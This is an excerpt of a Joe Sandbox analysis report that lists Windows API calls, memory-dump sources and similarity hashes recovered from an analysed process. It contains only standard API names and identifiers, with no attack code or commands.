                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3368777196-0
                                                                                                                                        • Opcode ID: 6d30af928de234b7158a374bf47f4dfc742baa93eaae2504efaf6bcbb520e06c
                                                                                                                                        • Instruction ID: 3f1e4296f134bff51db4536e89256d40dbd3d19bf02e736c823f5e8d8ca1ff38
                                                                                                                                        • Opcode Fuzzy Hash: 6d30af928de234b7158a374bf47f4dfc742baa93eaae2504efaf6bcbb520e06c
                                                                                                                                        • Instruction Fuzzy Hash: 4D415771A10206AFDF14EF54DC85AAA7BB8FF04300F1440B9ED00AB296DB70DE60DBA0
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B7F3AB,00000000,?,?,00000000,?,00B7682C,00000004,00000000,00000000), ref: 00BB824C
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00BB8272
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BB82D1
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00BB82E5
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00BB830B
                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BB832F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                        • Opcode ID: 08bba3d875cdea9d76a8adada4648121bd8ba16c2b93cc80e7c67f73f40e3ccf
                                                                                                                                        • Instruction ID: c8fce94498643fc67504b39a41ec2a582cbd278b728225ad50c382a5f66d2299
                                                                                                                                        • Opcode Fuzzy Hash: 08bba3d875cdea9d76a8adada4648121bd8ba16c2b93cc80e7c67f73f40e3ccf
                                                                                                                                        • Instruction Fuzzy Hash: A4416134601644EFDB16CF15D899BF47BE5FB4A714F1842E9E5084B262CBB1AC41CF94
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00B84C95
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B84CB2
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B84CEA
                                                                                                                                        • _wcslen.LIBCMT ref: 00B84D08
                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B84D10
                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00B84D1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 72514467-0
                                                                                                                                        • Opcode ID: 72df2973a55cd87fdda95dbb18604b83cf72dbe79e54d957895bb1d7ab307c4f
                                                                                                                                        • Instruction ID: 8e6c26877349ca45848a784237be146a02b50acc32bd6905e61701dc3c943923
                                                                                                                                        • Opcode Fuzzy Hash: 72df2973a55cd87fdda95dbb18604b83cf72dbe79e54d957895bb1d7ab307c4f
                                                                                                                                        • Instruction Fuzzy Hash: CC21B372604216BBEB15AB299C49E7B7BDCDB45750F1040B9F805CB1A1EBA19D01D7A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B23A97,?,?,00B22E7F,?,?,?,00000000), ref: 00B23AC2
                                                                                                                                        • _wcslen.LIBCMT ref: 00B9587B
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B95995
                                                                                                                                        • CoCreateInstance.OLE32(00BBFCF8,00000000,00000001,00BBFB68,?), ref: 00B959AE
                                                                                                                                        • CoUninitialize.OLE32 ref: 00B959CC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                                        • Opcode ID: 5fc556559de6cedb1543ae3ec7d085c18238abd3212070589bfe0375128ff4f9
                                                                                                                                        • Instruction ID: e1bff913a5959f033ac4a917e6cfde88bcec110fdc2e2612ec44a72c4275cd6c
                                                                                                                                        • Opcode Fuzzy Hash: 5fc556559de6cedb1543ae3ec7d085c18238abd3212070589bfe0375128ff4f9
                                                                                                                                        • Instruction Fuzzy Hash: A4D173716487119FCB24DF24C480A2ABBE5FF89710F1488ADF8899B361DB31ED45CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B80FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B80FCA
                                                                                                                                          • Part of subcall function 00B80FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B80FD6
                                                                                                                                          • Part of subcall function 00B80FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B80FE5
                                                                                                                                          • Part of subcall function 00B80FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B80FEC
                                                                                                                                          • Part of subcall function 00B80FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B81002
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00B81335), ref: 00B817AE
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B817BA
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B817C1
                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B817DA
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00B81335), ref: 00B817EE
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B817F5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                        • Opcode ID: d3570a3d9eb503533d458a7f14aa737731e5b07f776375477aa9888824ce6c7f
                                                                                                                                        • Instruction ID: 6587f66022ca605b49e37d9495607afd65dd4ac9a87fb7ed9735371f53120919
                                                                                                                                        • Opcode Fuzzy Hash: d3570a3d9eb503533d458a7f14aa737731e5b07f776375477aa9888824ce6c7f
                                                                                                                                        • Instruction Fuzzy Hash: C011DCB6502204EFDB10EFA8DC48BAE7BECEB41355F10499DF581A7220CB75AD01CB60
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B814FF
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00B81506
                                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B81515
                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00B81520
                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B8154F
                                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B81563
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1413079979-0
                                                                                                                                        • Opcode ID: d5ab566344b7931f22991483db8c8ccbc8df7908b785d43aaabd07736f3ac490
                                                                                                                                        • Instruction ID: ffb97f56a201eb4bb74234afac93ee4343ea18d6ea626d3b746e94ea5d0ccdb6
                                                                                                                                        • Opcode Fuzzy Hash: d5ab566344b7931f22991483db8c8ccbc8df7908b785d43aaabd07736f3ac490
                                                                                                                                        • Instruction Fuzzy Hash: AA115672505209ABDF11DFA8ED49FDE7BADEF48704F044164FA05A2160C7B1CE61DB60
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,00B43379,00B42FE5), ref: 00B43390
                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4339E
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B433B7
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00B43379,00B42FE5), ref: 00B43409
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                        • Opcode ID: 6ea4e10131aa5606162e533e54dfdadbb98575f04ab42dfc703dd3e43dd79163
                                                                                                                                        • Instruction ID: ec87e62b9c7b116767930fb3b5f51aaa5291f8642766ce776719eb77703ed606
                                                                                                                                        • Opcode Fuzzy Hash: 6ea4e10131aa5606162e533e54dfdadbb98575f04ab42dfc703dd3e43dd79163
                                                                                                                                        • Instruction Fuzzy Hash: F001D83360D312BFAA192BB47CC56562ED4EB05F7972802A9F420862F2EF614F027548
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,00B55686,00B63CD6,?,00000000,?,00B55B6A,?,?,?,?,?,00B4E6D1,?,00BE8A48), ref: 00B52D78
                                                                                                                                        • _free.LIBCMT ref: 00B52DAB
                                                                                                                                        • _free.LIBCMT ref: 00B52DD3
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00B4E6D1,?,00BE8A48,00000010,00B24F4A,?,?,00000000,00B63CD6), ref: 00B52DE0
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00B4E6D1,?,00BE8A48,00000010,00B24F4A,?,?,00000000,00B63CD6), ref: 00B52DEC
                                                                                                                                        • _abort.LIBCMT ref: 00B52DF2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                        • Opcode ID: 3e4252da3ad86b011dbc186f7fa745989a00ec3a3bbabb3cddb55ad4f94ae094
                                                                                                                                        • Instruction ID: 6d06b69ea660eab325c2ff8826a1c0f3d6757a56021130263d947ac1769c3a0a
                                                                                                                                        • Opcode Fuzzy Hash: 3e4252da3ad86b011dbc186f7fa745989a00ec3a3bbabb3cddb55ad4f94ae094
                                                                                                                                        • Instruction Fuzzy Hash: 45F0A436506A0027D2126734AC06F5A2AF9EFC37A3F2445F9FC24A32E2EF75880E4161
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B39693
                                                                                                                                          • Part of subcall function 00B39639: SelectObject.GDI32(?,00000000), ref: 00B396A2
                                                                                                                                          • Part of subcall function 00B39639: BeginPath.GDI32(?), ref: 00B396B9
                                                                                                                                          • Part of subcall function 00B39639: SelectObject.GDI32(?,00000000), ref: 00B396E2
                                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BB8A4E
                                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 00BB8A62
                                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BB8A70
                                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 00BB8A80
                                                                                                                                        • EndPath.GDI32(?), ref: 00BB8A90
                                                                                                                                        • StrokePath.GDI32(?), ref: 00BB8AA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                        • Opcode ID: 2165e291293298e59e0f4903b504748d780d1ea9c53ca1c41bb627d0a2079661
                                                                                                                                        • Instruction ID: f07c62818eab721494fdedf5e0252d682896078e2d41c5007639ddba1b4dc39a
                                                                                                                                        • Opcode Fuzzy Hash: 2165e291293298e59e0f4903b504748d780d1ea9c53ca1c41bb627d0a2079661
                                                                                                                                        • Instruction Fuzzy Hash: 36110976400109FFDB129F94DC88EAA7FACEB08350F008552BA199A1A1CBB19D55DFA0
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 00B85218
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B85229
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B85230
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B85238
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B8524F
                                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B85261
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                        • Opcode ID: dd7582bbede7af5d533088120d5dd2915e1ec256ce4398f78d8e314ee07ad70c
                                                                                                                                        • Instruction ID: 804cbea65267dcb8129f1f4d15991dba45c729e98ccd3f93575f9f2fa5f8550d
                                                                                                                                        • Opcode Fuzzy Hash: dd7582bbede7af5d533088120d5dd2915e1ec256ce4398f78d8e314ee07ad70c
                                                                                                                                        • Instruction Fuzzy Hash: 0E016275E01719BBEB10AFA99C49E5EBFB8EF48751F044165FA05EB291DA709C00CFA0
                                                                                                                                        APIs
                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B21BF4
                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B21BFC
                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B21C07
                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B21C12
                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B21C1A
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B21C22
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                        • Opcode ID: fbe3737025139df3236d31eb801a4d8ae7e0412825a4c040807432125e879cfc
                                                                                                                                        • Instruction ID: ec2de0c06490d2939ac7150a3486b0e744a5fc89fed9bb01311647c4e8a2fcea
                                                                                                                                        • Opcode Fuzzy Hash: fbe3737025139df3236d31eb801a4d8ae7e0412825a4c040807432125e879cfc
                                                                                                                                        • Instruction Fuzzy Hash: 0D0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B8EB30
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B8EB46
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B8EB55
                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8EB64
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8EB6E
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8EB75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                        • Opcode ID: a6caec4a5e8b404c4ff07531c4adf9e09f3f8e8d4e3a2123ef62723686980ebc
                                                                                                                                        • Instruction ID: e521c1452aa02cfbb612fc207e2b2ab3b7b6e75926b7c84e7c91b717cb696f50
                                                                                                                                        • Opcode Fuzzy Hash: a6caec4a5e8b404c4ff07531c4adf9e09f3f8e8d4e3a2123ef62723686980ebc
                                                                                                                                        • Instruction Fuzzy Hash: 88F01D72140158BBE6219B529C0DEEB3E7CEBCAB11F000259F612E2091ABE05A01C6B5
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?), ref: 00B77452
                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B77469
                                                                                                                                        • GetWindowDC.USER32(?), ref: 00B77475
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00B77484
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B77496
                                                                                                                                        • GetSysColor.USER32(00000005), ref: 00B774B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                        • Opcode ID: 9cd8a9f5cf86113d8f1c08b55677dfc4e25c381da9bbe1fce4c618e5ec96d904
                                                                                                                                        • Instruction ID: ce5199457cce19be8be36fd5d11c70400674fa4601a19391b635ae9ddf16ff11
                                                                                                                                        • Opcode Fuzzy Hash: 9cd8a9f5cf86113d8f1c08b55677dfc4e25c381da9bbe1fce4c618e5ec96d904
                                                                                                                                        • Instruction Fuzzy Hash: 26014B31404215EFDB519F64DC09FAA7FB5FB04311F6146A4F92AA31A1CFB11E51EB50
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B8187F
                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00B8188B
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B81894
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B8189C
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B818A5
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B818AC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
